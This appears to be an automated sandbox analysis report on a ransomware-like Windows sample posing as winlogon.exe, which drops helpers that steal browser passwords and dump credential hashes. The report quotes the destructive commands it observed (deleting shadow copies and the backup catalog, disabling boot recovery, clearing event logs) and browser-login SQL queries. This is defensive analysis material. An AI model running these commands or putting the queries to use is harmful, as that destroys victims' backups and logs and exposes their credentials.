Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Command line argument: wevtutil.exe | 4_2_001416E9
PE file has an executable .text section and no other executable section
Source: winlogon.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini files
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Reads software policies
Source: C:\Users\user\Desktop\winlogon.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
SQL strings found in memory and binary data
Source: yegus.exe | Binary or memory string: SELECT origin_url, username_value, password_value FROM logins;`R
Source: yegus.exe | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: yegus.exe | Binary or memory string: SELECT origin_url, username_value, password_value FROM logins;
Source: yegus.exe | Binary or memory string: SELECT formSubmitURL, encryptedUsername, encryptedPassword FROM moz_logins;
Source: yegus.exe | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: yegus.exe | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: yegus.exe | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Sample is known by Antivirus (Virustotal or Metascan)
Source: winlogon.exe | Virustotal: hash found
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\winlogon.exe 'C:\Users\user\Desktop\winlogon.exe'
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\yegus.exe 123 \\.\pipe\122B85FE-84BD-45AB-AEE5-28D37FB4C464
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\ucngw.exe 123 \\.\pipe\33F83B68-FC3D-4C1F-B4AE-1329770D367B
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\_usm.exe C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
Source: unknown | Process created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quiet
Source: unknown | Process created: C:\Windows\System32\wbengine.exe C:\Windows\system32\wbengine.exe
Source: unknown | Process created: C:\Windows\System32\vdsldr.exe C:\Windows\System32\vdsldr.exe -Embedding
Source: unknown | Process created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
Source: unknown | Process created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl System
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
Source: unknown | Process created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl Security
Source: unknown | Process created: C:\Windows\System32\LogonUI.exe 'LogonUI.exe' /flags:0x0
Source: unknown | Process created: C:\Windows\System32\LogonUI.exe unknown
Source: C:\Users\user\Desktop\winlogon.exe | Process created: C:\Users\user\AppData\Local\Temp\yegus.exe 123 \\.\pipe\122B85FE-84BD-45AB-AEE5-28D37FB4C464
Source: C:\Users\user\Desktop\winlogon.exe | Process created: C:\Users\user\AppData\Local\Temp\ucngw.exe 123 \\.\pipe\33F83B68-FC3D-4C1F-B4AE-1329770D367B
Source: C:\Users\user\Desktop\winlogon.exe | Process created: C:\Users\user\AppData\Local\Temp\_usm.exe C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quiet
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl System
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl Security
Uses an in-process (OLE) Automation server
Source: C:\Users\user\Desktop\winlogon.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)
Source: winlogon.exe | Static PE information: Section: .rsrc ZLIB complexity 1.00009145872
Source: yegus.exe.1.dr | Static PE information: Section: .rsrc ZLIB complexity 0.999364306084
Source: ucngw.exe.1.dr | Static PE information: Section: .rsrc ZLIB complexity 0.995655293367
Source: _yig.exe.1.dr | Static PE information: Section: .rsrc ZLIB complexity 1.00009145872
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_100147C0 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,LocalFree
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10013CB0 LoadLibraryW,GetModuleHandleW,NtQueryInformationProcess
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_100145E0 GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb
Creates files inside the system directory
Source: C:\Windows\System32\wbadmin.exe | File created: C:\Windows\Logs\WindowsBackup
Detected potential crypto function
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D7989E
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D793F0
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6F6CE
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D7CF3F
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D61110
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D69330
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D61870
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D68EE0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_01331370
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_0133E8FF
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013315E0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013310A0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_01332B70
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013332D0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10064140
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100196A0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10029130
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1003C880
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10053C80
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10065870
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100804F0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10027050
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10006022
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10007870
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10005C30
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1006F810
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10036CD0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1003B6A0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10008D50
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10079459
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10022AD0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10078060
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10017050
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10002200
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1002DD28
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10074780
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10021F80
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1001EBB0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1001CFF0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1008DE01
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100722E0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5FC90
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C60F40
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5D39F
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5FD20
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C61150
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5F3F0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5F6A0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10004950
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_100039B3
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_1000F898
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10003C10
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_1000B61E
Enables security privileges
Source: C:\Users\user\Desktop\winlogon.exe | Process token adjusted: Security
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\winlogon.exe | Code function: String function: 00D6B650 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: String function: 100071E0 appears 59 times
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: String function: 10024C30 appears 105 times
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: String function: 10007480 appears 193 times
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: String function: 10008070 appears 167 times
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: String function: 00C51CA0 appears 32 times
PE file contains executable resources (Code or Archives)
Source: _wjg.exe.1.dr | Static PE information: Resource name: BINRES type: PE32 executable (console) Intel 80386, for MS Windows
Reads the hosts file
Source: C:\Users\user\Desktop\winlogon.exe | File read: C:\Windows\System32\drivers\etc\hosts (6 occurrences)
Sample file is different than original file name gathered from version info
Source: winlogon.exe | Binary or memory string: OriginalFilenamepsexec.cH vs winlogon.exe
Source: winlogon.exe | Binary or memory string: OriginalFilenamepsexesvc.exeH vs winlogon.exe
Sample reads its own file content
Source: C:\Users\user\Desktop\winlogon.exe | File read: C:\Users\user\Desktop\winlogon.exe
Tries to load missing DLLs
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to execute programs as a different user
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D63920 LogonUserA,GetLastError,DeleteCriticalSection
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D65DD0 ExitProcess,Sleep,DeleteFileW,GetFileSize,WriteFile,GetFileAttributesW,CreateFileW,CloseHandle,GetModuleHandleW,GetModuleFileNameW,GetWindowsDirectoryW,CreateProcessW,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,TerminateProcess,CloseHandle
Contains functionality to inject threads in other processes
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D65DD0 ExitProcess,Sleep,DeleteFileW,GetFileSize,WriteFile,GetFileAttributesW,CreateFileW,CloseHandle,GetModuleHandleW,GetModuleFileNameW,GetWindowsDirectoryW,CreateProcessW,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,TerminateProcess,CloseHandle

Anti Debugging:

Contains functionality to register its own exception handler
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6B598 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6AE70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6B406 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D7009F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013347F1 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013346A3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013340FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013372DB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100827CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1008657C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10083265 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C51BE9 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C54CBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C514CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C51A54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10001795 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_1000662D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10001B37 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_001417EA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_0014333B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\Desktop\winlogon.exe | System information queried: KernelDebuggerInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6B406 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D643A0 GetVersionExW,LoadLibraryW,GetProcAddress,SHGetKnownFolderPath
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D70D28 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_01337F59 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10085756 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C558EB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_100051BB mov eax, dword ptr fs:[00000030h]
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6A6F0 GetProcessHeap,RtlAllocateHeap
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Process token adjusted: Debug

Malware Analysis System Evasion:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D75F8F FindFirstFileExW
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_01339A82 FindFirstFileExW
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10088620 FindFirstFileExA
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5850A FindFirstFileExW
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10008EEC FindFirstFileExA
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_00141441 wsprintfW,FindFirstFileW,GetProcessHeap,PathAppendW,GetProcessHeap,HeapAlloc,PathAppendW,PathAppendW,StrCmpCW,StrCmpCW,StrCmpCW,CreateFileW,GetFileSizeEx,CloseHandle,GetProcessHeap,HeapFree,FindNextFileW,FindClose
Contains functionality to query system information
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1000D3F0 GetSystemInfo
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: wbadmin.exe | Binary or memory string: Cluster service, and Hyper-V for more information.
Source: wbadmin.exe | Binary or memory string: An error occurred while preparing to back up Hyper-V data.
Program exit points
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | API call chain: ExitProcess graph end node
Queries a list of all running processes
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Process information queried: ProcessInformation
Contains functionality to enumerate running services
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_001412E8 OpenSCManagerW,EnumServicesStatusW,EnumServicesStatusW,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusW,QueryServiceConfigW,OpenServiceW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,ChangeServiceConfigW,QueryServiceConfigW,PathRemoveArgsW,GetProcessHeap,HeapFree,GetLastError,CloseServiceHandle,GetProcessHeap,HeapFree,CloseServiceHandle
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Thread delayed: delay time: 3600000
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\winlogon.exe | Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\_yig.exe
Source: C:\Users\user\Desktop\winlogon.exe | Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\_wjg.exe
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Found evasive API chain checking for process token information
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\winlogon.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_1-13588
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\winlogon.exe TID: 3392 | Thread sleep time: -60000s >= -60000s
Source: C:\Users\user\AppData\Local\Temp\yegus.exe TID: 3268 | Thread sleep time: -120000s >= -60000s
Source: C:\Users\user\AppData\Local\Temp\_usm.exe TID: 3300 | Thread sleep time: -3600000s >= -60000s
Source: C:\Windows\System32\wbadmin.exe TID: 3460 | Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\wbadmin.exe TID: 3460 | Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\wbengine.exe TID: 3492 | Thread sleep count: 89 > 30
Source: C:\Windows\System32\wbengine.exe TID: 3492 | Thread sleep time: -5340000s >= -60000s
Source: C:\Windows\System32\vdsldr.exe TID: 3520 | Thread sleep count: 57 > 30
Source: C:\Windows\System32\vdsldr.exe TID: 3520 | Thread sleep time: -3420000s >= -60000s
Source: C:\Windows\System32\vdsldr.exe TID: 3520 | Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\vds.exe TID: 3548 | Thread sleep count: 81 > 30
Source: C:\Windows\System32\vds.exe TID: 3548 | Thread sleep time: -4860000s >= -60000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\vdsldr.exe | Last function: Thread delayed

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\winlogon.exe | Process information set: NOOPENFILEERRORBOX (9 occurrences)
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX (9 occurrences)
Creates files inside the volume driver (system volume information)
Source: C:\Windows\System32\wbengine.exe | File created: C:\System Volume Information\WindowsImageBackup

Language, Device and Operating System Detection:

Contains functionality to create pipes for IPC
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D634B0 wsprintfW,CreateNamedPipeW,CreateEventW,CloseHandle,ConnectNamedPipe,GetLastError,CloseHandle,CloseHandle,CloseHandle,WaitForSingleObject,GetOverlappedResult,CancelIo,CloseHandle,ReadFile,CloseHandle
Contains functionality to query local / system time
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D74EF7 GetSystemTimeAsFileTime
Contains functionality to query time zone information
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100879B6 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Contains functionality to query windows version
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D65970 GetVersionExW,__Stoull,__Stoull
Queries the cryptographic machine GUID
Source: C:\Users\user\Desktop\winlogon.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6B6CE cpuid
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\secmod.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\cert8.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\key3.db VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation

Behavior Graph

Behavior Graph ID: 46216 | Sample: winlogon.exe | Start date: 12/02/2018 | Architecture: WINDOWS | Score: 100

  • winlogon.exe (submitted sample)
    • Signatures: Antivirus detection for dropped file; Antivirus detection for submitted file; May disable shadow drive data (uses vssadmin); 3 other signatures
    • DNS: 252.0.0.224.in-addr.arpa (Tries to resolve many domain names, but no domain seems valid)
    • Started: winlogon.exe, wbengine.exe, vdsldr.exe, 3 other processes
  • winlogon.exe (process)
    • Contacted: 8.8.8.8 on ports 49408, 50225, 51075 (GOOGLE-GoogleIncUS, United States; Tries to resolve many domain names, but no domain seems valid); 192.168.2.238 on port 135 (unknown); 8 other IPs or domains
    • Dropped: C:\Users\HERBBL~1\AppData\Local\...\_usm.exe (PE32); C:\Users\HERBBL~1\AppData\Local\...\yegus.exe (PE32); C:\Users\HERBBL~1\AppData\Local\...\ucngw.exe (PE32); 2 other files (none is malicious)
    • Signatures: Contains functionality to inject threads in other processes; Contains functionality to inject code into remote processes
    • Started: _usm.exe, yegus.exe, ucngw.exe
  • wbengine.exe: Creates files inside the volume driver (system volume information)
  • _usm.exe: started three cmd.exe instances and 2 other processes
    • cmd.exe: May disable shadow drive data (uses vssadmin); Deletes shadow drive data (may be related to ransomware); started vssadmin.exe
    • cmd.exe: Uses bcdedit to modify the Windows boot settings; started bcdedit.exe, bcdedit.exe
    • cmd.exe: started wbadmin.exe
    • 2 other processes: started wevtutil.exe, wevtutil.exe
  • yegus.exe: Contains functionality to steal Internet Explorer form passwords; Contains functionality to steal Chrome passwords; Tries to harvest and steal browser information (history, passwords, etc)
  • ucngw.exe: Contains functionality to dump credential hashes (LSA Dump)

Simulations

Behavior and APIs

No simulations

Antivirus Detection

Initial Sample

Source | Detection | Cloud
winlogon.exe | 62% | virustotal

Dropped Files

Source | Detection | Cloud
C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe | 60% | virustotal
C:\Users\HERBBL~1\AppData\Local\Temp\_wjg.exe | 0% | virustotal
C:\Users\HERBBL~1\AppData\Local\Temp\_wjg.exe | 3% | metadefender

Domains

Source | Detection | Cloud
252.0.0.224.in-addr.arpa | 0% | virustotal

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

Dropped Files

No context

Screenshot


Startup

  • System is w7
  • winlogon.exe (PID: 3216 cmdline: 'C:\Users\user\Desktop\winlogon.exe' MD5: CFDD16225E67471F5EF54CAB9B3A5558)
    • yegus.exe (PID: 3232 cmdline: 123 \\.\pipe\122B85FE-84BD-45AB-AEE5-28D37FB4C464 MD5: 4F43F03783F9789F804DCF9B9474FA6D)
    • ucngw.exe (PID: 3280 cmdline: 123 \\.\pipe\33F83B68-FC3D-4C1F-B4AE-1329770D367B MD5: 6E0EBEEEA1CB00192B074B288A4F9CFE)
    • _usm.exe (PID: 3296 cmdline: C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe MD5: 3C0D740347B0362331C882C2DEE96DBF)
      • cmd.exe (PID: 3336 cmdline: C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet MD5: AD7B9C14083B52BC532FBA5948342B98)
